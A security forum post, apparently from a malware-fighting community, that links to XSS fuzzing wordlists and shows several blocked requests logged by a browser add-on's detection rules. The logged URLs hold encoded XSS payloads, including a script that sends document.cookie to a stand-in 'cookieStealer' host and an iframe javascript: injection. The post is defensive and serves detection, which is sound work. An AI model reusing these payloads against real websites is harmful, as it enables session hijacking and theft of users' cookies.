Hi malware fighters,
link here: http://code.google.com/p/wfuzz/source/browse/trunk/wordlist/Injections/XSS.txt?r=2
and another database here: http://www.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&setlang=en
and here: http://airodump.net/xss-pentest-plugin-cross-site-scripting/
or here: http://www.allinfosec.com/2010/06/16/wowbb-1-7-xss-vulnerabilities-3/
All checked andf blocked by my firekeeper lists, example:
=== Triggered rule ===
alert(url_content:“%3CSCRIPT”; nocase; msg:“ tags GET request cross site scripting attempt”; url_re:“/%3Cscript.*%3E/i”; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C%2FIFRAME%253E+%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2FcookieStealer%2Fcgi-bin%2Fcookie.cgi%3F%27%2Bdocument.cookie%3C%2Fscript%3E&ie=utf-8&oe=utf-8&aq=t
and a good read: http://www.xc0re.net/index.php?p=1_10_Knowledge-Core
Mind you when it starts with " it does not work…
Just one more example:
=== Triggered rule ===
alert(url_content:“javascript:”; nocase; msg:“javascript: GET request cross site scripting attempt”; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
http://pmw90687.surfcanyon.com/queryReformulation?partner=wot&authCode=pmw90687&format=jsonp&callback=contentscript.callback1&q=<iframe+src=”javascript:document.vulnerable=true;
NoScript alerts and filters this one out…
And they come in all devious forms, like:
=== Triggered rule ===
alert(url_content:“%3CSCRIPT”; nocase; msg:“ tags GET request cross site scripting attempt”; url_re:“/%3Cscript.*%3E/i”; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=admin+anubis%257C%257C9f55c7e99c128fb18b0ce725a8c2bdea+%3Cscript%3E&ie=utf-8&oe=utf-8&aq=t
polonus